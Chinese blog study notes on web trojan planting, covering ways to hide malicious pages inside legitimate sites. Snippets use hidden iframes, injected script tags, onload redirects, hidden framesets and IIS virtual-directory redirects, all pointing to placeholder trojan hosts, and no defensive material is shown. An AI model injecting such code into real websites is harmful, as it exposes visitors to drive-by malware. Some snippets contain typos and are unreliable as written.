网页木马攻防实战学习笔记一
把网页木马嵌入到正常网页中的行为就称“挂马”。
网页木马的隐藏技术
- 插入隐藏框架:<iframe src = http://网页木马地址 width=0 height=0></iframe>
- 利用javascript:<script src = "http://xx.js" type = text/javascript>
利用JS引入木马的方式很多:
1 在js中直接写出框架网页木马,示例代码如下:document.write("<iframe width=’0’ height=’0’src='网页木马地址'></iframe>");2 指定language的属性为"JScript.Encode",示例代码如下:<SCRIPT language="JScript.Encode"src=http://www.xxx.com/mm.jpg></script>;3 利用js更改body的innerHTML属性,示例代码如下:top.document.body.innerHTML=top.document.body.innerHTML+'rin<iframe src="http://网页木马地址/%22%3E%3C/iframe%3E4 利用JavaScript的window.open方法打开一个不可见的新窗口,示例代码如下:
<SCRIPT language=javascript>window.open("网页木马地址","","toolbar=no.location=no,
directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");</script>5 利用URL欺骗,示例代码如下:<a href="http://www.163.com”onMouseOver="www_163_com();return true;">页面要显示的正常内容</a>:
<SCRIPT Language="JavaScript">
function www_163_com()
{var url="网页木马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,
scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");}
</SCRIPT>
- 利用body的onload属性引入网页木马:
<body οnlοad="window.location='网页木马地址’;"></body>
- 利用层叠样式表CSS引入js,从而引入网页木马,示例代码如下:
body(background- image:url(javascript:document.write("<script src=http://www.XXX.com/xx.js</script>")’)}
- 利用隐藏的分割框架引入网页木马,示例代码如下:
<frameset rows=”444,0” cols=”*”>
<frame src = “正常网页” framborder=”no” scrolling="auto" noresize marginwidth="0" margingheight="0">
<frame src="网页木马" frameborder="no"scrolling="no"noresize marginwidth="0"margingheight="0">
</frameset>
- 利用ISAPI引入网页木马
- 利用IIS的资源重定向引入网页木马:
1 用如下命令建立虚拟目录:
script adsutil,vbs Create W3SVC/1/Root/include"IIiaWebVirtualDir”
于是就建立了一个IIS里不可见的虚拟目录,因为没有设置路径,所以不会在IIS管理器中显示。2 在这个目录下建立一个名字叫做xx.js的虚拟目录:
script adsutil.vbs Create W3svc/1/Root/include/xx.js"IisWebVirtualDir”
这样,就存在一个include/xx.js的虚拟目录了。3 利用脚本对这个目录进行资源重定向
cscript adsutil.vbs set W3SVC/1/Root/www/include/mm2.js/httpredirect"http://xx.com/yy.js"
这样就更改了xx.js虚拟目录的重定向特性。
- 利用数据库引入网页木马
- 利用统计网站大规模挂马
- 利用ARP欺骗引入网页木马
网页木马攻防实战学习笔记一相关推荐
- Java 8 实战学习笔记
Java 8 实战学习笔记 @(JAVASE)[java8, 实战, lambda] 文章目录 Java 8 实战学习笔记 参考内容 Lambda表达式 Lambda环绕执行模式(抽离步骤) 原始代码 ...
- Linux性能优化实战学习笔记:第四十六讲=====实战分析
Linux性能优化实战学习笔记:第四十六讲 一.上节回顾 不知不觉,我们已经学完了整个专栏的四大基础模块,即 CPU.内存.文件系统和磁盘 I/O.以及网络的性能分析和优化.相信你已经掌握了这些基础模 ...
- ctf线下AWD攻防赛学习笔记
Hello,我是普通Gopher,00后男孩,极致的共享主义者,想要成为一个终身学习者.专注于做最通俗易懂的计算机基础知识类公众号.每天推送Golang技术干货,内容起于K8S而不止于K8S,涉及Do ...
- JetpackCompose从入门到实战学习笔记2——Modifier的简单使用
JetpackCompose从入门到实战学习笔记2--Modifier的简单使用 1.Image的使用: @Composable fun Image(modifier: Modifier) {Row ...
- 第127讲:Hadoop集群管理之安全模式解析及动手实战学习笔记
第127讲:Hadoop集群管理之安全模式解析及动手实战学习笔记 hadoop在启动时namenode会把fsimage加载进内存,同时和edits内容合并,以此建立整个文件系统的元数据的镜像(内存级 ...
- “物联网开发实战”学习笔记-(四)智能音箱制作和语音控制
"物联网开发实战"学习笔记-(四)智能音箱制作和语音控制 这次来造一个属于自己的智能音箱,这里详细介绍了智能音箱的语音控制的实现. 智能音箱的技术架构 智能音箱主要涉及拾音.前端信 ...
- Word2vec原理+实战学习笔记(二)
来源:投稿 作者:阿克西 编辑:学姐 前篇:Word2vec原理+实战学习笔记(一) 视频链接:https://ai.deepshare.net/detail/p_5ee62f90022 ...
- “物联网开发实战”学习笔记-(二)手机控制智能电灯
"物联网开发实战"学习笔记-(二)手机控制智能电灯 如果搭建好硬件平台后,这一次我们的任务主要是调试好智能电灯,并且连接到腾讯云的物联网平台. 腾讯云物联网平台 腾讯物联网平台的优 ...
- MongoDB 入门教程实战学习笔记-31-mongo 聚合查询管道 Aggregation Pipieline
aggregation 聚合操作处理数据记录并返回计算结果. 聚合操作将多个文档中的值组合在一起, 并且可以对分组数据执行各种操作以返回单个结果. mongodb 提供了三种执行聚合的方法: 聚合管道 ...
- 2021-08-31《内网安全攻防》学习笔记,第二章-域内信息收集(转自PowerLiu)
<内网安全攻防>学习笔记,第二章-域内信息收集 2020-07-212020-07-21 15:08:47阅读 1.1K0 2.1 内网信息搜集概述 当渗透测试人员进入内网后,面对的是一片 ...
最新文章
- CCNET+MSBuild+SVN实时构建的优化总结
- 图灵奖得主杨立昆:人工智能比你更聪明吗?
- ubuntu下安装java和tomcat安装
- 本地仓库管理权限问题
- 解析BW:数据源提取数据的原理
- Python Django创建项目命令
- bootstrap 表格不用tr td如何写_Pandas还能用来写爬虫?
- 微信公众号支付php demo,200行代码实现微信支付-公众号支付,不再踩坑,附:demo...
- 如何运用领域驱动设计 - 存储库
- java实现base64加密解密
- 最高检:教职工有性侵记录的,不得录用
- MemCache对PHP页面的缓存加速优化
- WPF MVVM 验证
- 四川信息职业技术学院2019考纲复习
- asp.net的验证控件教程
- 声音鉴定-趣味测试-源码
- Bulletproofs、Sigma protocol、Halo2等ZK方案小结
- 石家庄推进智慧城市建设 数字校园将覆盖所有学校
- 第八课:ShuffleNet v1、ShuffleNet v2学习
- pip install 安装的问题